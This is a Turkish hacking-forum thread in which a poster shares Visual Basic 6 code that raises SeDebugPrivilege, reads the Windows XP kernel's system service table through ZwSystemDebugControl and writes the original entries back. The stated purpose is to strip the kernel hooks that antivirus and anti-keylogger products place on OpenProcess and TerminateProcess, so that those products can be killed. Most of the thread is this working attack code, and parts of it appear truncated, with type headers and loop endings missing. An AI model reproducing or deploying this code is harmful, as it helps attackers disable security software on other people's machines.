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SSDT Patlatan Kod (Surucu Kurmadan Çalişir)

  1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ustura's avatar
    Banlanmış Üye
    Kayıt Tarihi: 29/Ağustos/2005
    Option Explicit
    Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpLibFileName As String) As Long
    Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (ByVal pDst As Long, ByVal pSrc As Long, ByVal ByteLen As Long)
    Private Declare Function lstrlen Lib "kernel32" Alias "lstrlenA" (ByVal lpString As Long) As Long
    Private Declare Function LoadLibraryEx Lib "kernel32" Alias "LoadLibraryExA" (ByVal lpLibFileName As Long, ByVal hFile As Long, ByVal dwFlags As Long) As Long
    Private Declare Function FreeLibrary Lib "kernel32" (ByVal hLibModule As Long) As Long
    Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
    Private Declare Function ZwQuerySystemInformation Lib "ntdll.dll" (ByVal SystemInformationClass As SYSTEM_INFORMATION_CLASS, ByVal pSystemInformation As Long, ByVal SystemInformationLength As Long, ByVal pReturnLength As Long) As Long
    Private Declare Function ZwSystemDebugControl Lib "ntdll.dll" (ByVal ControlCode As SYSDBG_COMMAND, ByVal pInputBuffer As Long, ByVal InputBufferLength As Long, ByVal pOutputBuffer As Long, ByVal OutputBufferLength As Long, ByVal pReturnLength As Long) As Long
    Private Declare Function GetCurrentProcess Lib "kernel32" () As Long
    Private Declare Function OpenProcessToken Lib "advapi32.dll" (ByVal ProcessHandle As Long, ByVal DesiredAccess As Long, ByRef TokenHandle As Long) As Long
    Private Declare Function LookupPrivilegeValue Lib "advapi32" Alias "LookupPrivilegeValueA" (ByVal lpSystemName As Long, ByVal lpName As String, ByVal lpLuid As Long) As Long
    Private Declare Function AdjustTokenPrivileges Lib "advapi32" (ByVal TokenHandle As Long, ByVal DisableAllPrivileges As Long, ByRef NewState As TOKEN_PRIVILEGES, ByVal BufferLength As Long, Optional ByVal PreviousState As Long = 0, Optional ByVal ReturnLength As Long = 0) As Long
    Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
        Count As Long
        LowPart As Long
        HighPart As Long
        Attributes As Long
    End Type
    Public Enum SYSDBG_COMMAND
        SysDbgReadVirtualMemory = 8
        SysDbgWriteVirtualMemory = 9
    End Enum
        SystemModuleInformation = 11
    End Enum
    Private Type IMAGE_DOS_HEADER
        e_magic As Integer
        Unused(0 To 57) As Byte
        e_lfanew As Long
    End Type
    Private Type IMAGE_NT_HEADER
        Signature As Long
        Unused1(0 To 15) As Byte
        SizeOfOptionalHeader As Integer
        Characteristics As Integer
        Magic As Integer
        Unused3(0 To 25) As Byte
        ImageBase As Long
        Unused4(0 To 23) As Byte
        SizeOfImage As Long
        Unused5(0 To 31) As Byte
        NumberOfRvaAndSizes As Long
        ExportTableRva As Long
        ExportTableSize As Long
        Unused6(0 To 31) As Byte
        RelocationTableRva As Long
        RelocationTableSize As Long
    End Type
        Unused(0 To 11) As Byte
        Name As Long
        Base As Long
        NumberOfFunctions As Long
        NumberOfNames As Long
        AddressOfFunctions As Long
        AddressOfNames As Long
        AddressOfOrdinals As Long
    End Type
        VirtualAddress As Long
        SizeOfBlock As Long
    End Type
    Private Type IMAGE_FIXED_ENTRY
        Offset As Long
        Type As Long
    End Type
    Private Type ModuleInformation
        Reserved(7) As Byte
        Base As Long
        Size As Long
        Flags As Long
        Index As Integer
        Unknown As Integer
        Loadcount As Integer
        ModuleNameOffset As Integer
        ImageName(255) As Byte
    End Type
    Private Type MEMORY_CHUNKS
        Address As Long
        pData As Long
        Length As Long
    End Type
    Private Const DONT_RESOLVE_DLL_REFERENCES As Long = 1
    Private Const IMAGE_REL_BASED_HIGHLOW As Long = 3
    Private Const IMAGE_FILE_RELOCS_STRIPPED As Integer = 1
    Public FuncName(1023) As String, Address1(1023) As Long, Address2(1023) As Long, ModuleName(1023) As String
    Dim dwServices As Long, dwKernelBase As Long, dwKiServiceTable As Long
    Public Sub RecoverSSDT(ByVal num As Long)
        Address2(num) = Address1(num)
    End Sub
    Public Sub WriteSSDT()
        Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long
        With QueryBuff
            .Address = dwKiServiceTable + dwKernelBase
            .pData = VarPtr(Address2(0))
            .Length = dwServices * 4
            ZwSystemDebugControl SysDbgWriteVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
            'If ReturnLength <> .Length Then MsgBox "»Ö¸´Ê§°Ü!", vbCritical
        End With
    End Sub
    Private Function ModuleInformationFromPtr(ByVal pmi As Long) As ModuleInformation
        CopyMemory VarPtr(ModuleInformationFromPtr), pmi, 284
    End Function
    Public Sub EnableDebugPrivilege()
        Dim hProcess As Long, hToken As Long, pTokenPrivilege As TOKEN_PRIVILEGES
        hProcess = GetCurrentProcess()
        Assert OpenProcessToken(hProcess, &H28, hToken) = 1
        Assert LookupPrivilegeValue(0, "SeDebugPrivilege", VarPtr(pTokenPrivilege) + 4) = 1
        With pTokenPrivilege
            .Count = 1
            .Attributes = 2
        End With
        Assert AdjustTokenPrivileges(hToken, 0, pTokenPrivilege, 16) = 1
        Assert CloseHandle(hToken) = 1
    End Sub
    Private Function BaseRelocationFromPtr(ByVal pbr As Long) As IMAGE_BASE_RELOCATION
        CopyMemory VarPtr(BaseRelocationFromPtr), pbr, 8
    End Function
    Private Function WordFromPtr(ByVal pword As Long) As Long
        CopyMemory VarPtr(WordFromPtr), pword, 2
    End Function
    Private Function FindKiServiceTable(ByVal hModule As Long, ByVal dwKSDT As Long) As Long
        Dim DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER
        Dim pbr As Long, pfe As Long, bFirstChunk As Boolean, i As Long, forto As Long
        Dim dwFixups As Long, dwPointerRva As Long, dwPointsToRva As Long
        CopyMemory VarPtr(DosHeader), hModule, 64
        With DosHeader
            Assert .e_magic = &H5A4D
            CopyMemory VarPtr(NtHeader), hModule + .e_lfanew, 168
        End With
        With NtHeader
            Assert .Signature = &H4550
            Assert .Magic = &H10B
            Assert .SizeOfOptionalHeader >= 144
            Assert .NumberOfRvaAndSizes >= 6
            Assert .RelocationTableRva <> 0
            Assert ((.Characteristics And IMAGE_FILE_RELOCS_STRIPPED) = 0)
            pbr = .RelocationTableRva + hModule
        End With
        bFirstChunk = True
        Do While bFirstChunk Or CBool(BaseRelocationFromPtr(pbr).VirtualAddress)
            bFirstChunk = False
            pfe = pbr + 8
            forto = (BaseRelocationFromPtr(pbr).SizeOfBlock - 8) \ 2 - 1
            For i = 0 To forto
                If FixedEntryFromPtr(pfe).Type = IMAGE_REL_BASED_HIGHLOW Then
                    dwFixups = dwFixups + 1
                    dwPointerRva = BaseRelocationFromPtr(pbr).VirtualAddress + FixedEntryFromPtr(pfe).Offset
                    dwPointsToRva = DwordFromPtr(hModule + dwPointerRva) - NtHeader.ImageBase
                    If dwPointsToRva = dwKSDT Then
                        If WordFromPtr(hModule + dwPointerRva - 2) = &H5C7 Then
                            FindKiServiceTable = DwordFromPtr(hModule + dwPointerRva + 4) - NtHeader.ImageBase
                            Exit Function
                        End If
                    End If
                End If
                pfe = pfe + 2
            pbr = pbr + BaseRelocationFromPtr(pbr).SizeOfBlock
    End Function
    Private Function AddZero(ByVal Text As String, ByVal Length As Long) As String
        AddZero = String(Length - Len(Text), "0") & Text
    End Function
    Private Function FixedEntryFromPtr(ByVal pfe As Long) As IMAGE_FIXED_ENTRY
        Dim tmp As Integer
        CopyMemory VarPtr(tmp), pfe, 2
        FixedEntryFromPtr.Offset = tmp And 4095
        CopyMemory VarPtr(tmp), pfe + 1, 1
        FixedEntryFromPtr.Type = (tmp And 240) \ 16
    End Function
    Private Function DwordFromPtr(ByVal pdword As Long) As Long
        CopyMemory VarPtr(DwordFromPtr), pdword, 4
    End Function
    Public Sub GetSSDT()
    On Error Resume Next
        Dim i As Long, j As Long, Length As Long, Buff() As Byte, pKernelName As Long, hKernel As Long
        Dim dwKSDT As Long, pService As Long, DosHeader As IMAGE_DOS_HEADER, NtHeader As IMAGE_NT_HEADER
        dwServices = 0
        ZwQuerySystemInformation SystemModuleInformation, 0, 0, VarPtr(Length)
        ReDim Buff(Length - 1)
        ZwQuerySystemInformation SystemModuleInformation, VarPtr(Buff(0)), Length, 0
        With ModuleInformationFromPtr(VarPtr(Buff(4)))
            dwKernelBase = .Base
            pKernelName = VarPtr(.ImageName(0)) + .ModuleNameOffset
        End With
        hKernel = LoadLibraryEx(pKernelName, 0, DONT_RESOLVE_DLL_REFERENCES)
        dwKSDT = GetProcAddress(hKernel, "KeServiceDescriptorTable")
        Assert dwKSDT <> 0
        dwKSDT = dwKSDT - hKernel
        dwKiServiceTable = FindKiServiceTable(hKernel, dwKSDT)
        Assert dwKiServiceTable <> 0
        CopyMemory VarPtr(DosHeader), hKernel, 64
        With DosHeader
            Assert .e_magic = &H5A4D
            CopyMemory VarPtr(NtHeader), hKernel + .e_lfanew, 168
        End With
        With NtHeader
            Assert .Signature = &H4550
            Assert .Magic = &H10B
        End With
        pService = hKernel + dwKiServiceTable
        Do While DwordFromPtr(pService) - NtHeader.ImageBase < NtHeader.SizeOfImage
            Address1(dwServices) = DwordFromPtr(pService) - NtHeader.ImageBase + dwKernelBase
            pService = pService + 4
            dwServices = dwServices + 1
        FreeLibrary hKernel
        Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long
        With QueryBuff
            .Address = dwKernelBase + dwKiServiceTable
            .pData = VarPtr(Address2(0))
            .Length = dwServices * 4
        End With
        ZwSystemDebugControl SysDbgReadVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
        Length = DwordFromPtr(VarPtr(Buff(0)))
        For i = 0 To Length - 1
            With ModuleInformationFromPtr(VarPtr(Buff(i * 284 + 4)))
                For j = 0 To dwServices - 1
                    If Address2(j) >= .Base And Address2(j) < .Base + .Size Then
                        ModuleName(j) = StringFromPtr(VarPtr(.ImageName(0)))
                    End If
            End With
    End Sub
    Private Function StringFromPtr(ByVal pString As Long) As String
        Dim Buff() As Byte, Length As Long
        Length = lstrlen(pString)
        If Length = 0 Then Exit Function
        ReDim Buff(Length - 1)
        CopyMemory VarPtr(Buff(0)), pString, Length
        StringFromPtr = StrConv(Buff, vbUnicode)
    End Function
    Public Function ReadMemory(ByVal Address As Long, ByVal Length As Long) As Byte()
        Dim QueryBuff As MEMORY_CHUNKS, ReturnLength As Long, Buff() As Byte
        ReDim Buff(Length - 1)
        With QueryBuff
            .Address = Address
            .pData = VarPtr(Buff(0))
            .Length = Length
        End With
        ZwSystemDebugControl SysDbgReadVirtualMemory, VarPtr(QueryBuff), 12, 0, 0, VarPtr(ReturnLength)
        If ReturnLength = Length Then ReadMemory = Buff
    End Function
    Public Sub Assert(ByVal bBool As Boolean)
        If Not bBool Then
            MsgBox "Assertion Failed!", vbCritical, "Error"
        End If
    End Sub
    Public Sub FindNtdllExport()
        Dim i As Long, hNtdll As Long, FuncRVA() As Long, NameRVA() As Long, Ordinal() As Integer, ThisName As String, ThisNumber As Long
        hNtdll = GetModuleHandle("ntdll.dll")
        Assert hNtdll <> 0
        CopyMemory VarPtr(DosHeader), hNtdll, 64
        With DosHeader
            Assert .e_magic = &H5A4D
            CopyMemory VarPtr(NtHeader), hNtdll + .e_lfanew, 128
       End With
        With NtHeader
            Assert .Signature = &H4550
            Assert .Magic = &H10B
            Assert .SizeOfOptionalHeader >= 104
            Assert .NumberOfRvaAndSizes >= 1
            Assert .ExportTableSize >= 40
            CopyMemory VarPtr(ExportDirectory), hNtdll + .ExportTableRva, 40
        End With
        With ExportDirectory
            Assert StringFromPtr(.Name + hNtdll) = "ntdll.dll"
            ReDim FuncRVA(.NumberOfFunctions - .Base), NameRVA(.NumberOfNames - 1), Ordinal(.NumberOfNames - 1)
            CopyMemory VarPtr(FuncRVA(0)), hNtdll + .AddressOfFunctions + .Base * 4, (.NumberOfFunctions - .Base) * 4
            CopyMemory VarPtr(NameRVA(0)), hNtdll + .AddressOfNames, .NumberOfNames * 4
            CopyMemory VarPtr(Ordinal(0)), hNtdll + .AddressOfOrdinals, .NumberOfNames * 2
            For i = 0 To .NumberOfNames - 1
                ThisName = StringFromPtr(hNtdll + NameRVA(i))
                If Left(ThisName, 2) = "Nt" Then
                    ThisNumber = DwordFromPtr(FuncRVA(Ordinal(i) - .Base) + hNtdll + 1)
                    If ThisNumber >= 0 And ThisNumber < .NumberOfNames Then
                        FuncName(ThisNumber) = ThisName
                    End If
                End If
        End With
    End Sub
    sub main 
    Dim i As Long
    GetSSDT ' SSDT TAblosuna Git
    For i = 1 To UBound(Address1)
    RecoverSSDT i - 1 'Apileri Geri Yukle '(openprocess,TerminateProcess vb)
    end sub

    'Burdan Sonrasını Almayin

    'Kod  Eski oldugu ıcın sadece Xp de calısır  Win7 de Çalişmaz Xp de sorunsz çalişiyor (test edildi)

    'A,v A,L Gibi Guvenlık yazılımlarının OpenProcess , Terminate Process Gibi Çekirdekten Kancalanmiş Apileri Sürücü kurma Gereksimi Olmadan çözer
    'Bu Kodu Kullanarak Xp ' de Antivirusler ve Antiloggerlari Sorunsuz Killeyebilirsiniz

    'Belki Mürit Kardeşlerimin işine yarar diye paylasıyorum 


    itsin oglum sen adam degilsin
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ustura's avatar
    Banlanmış Üye
    Kayıt Tarihi: 29/Ağustos/2005
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
Toplam Hit: 3563 Toplam Mesaj: 3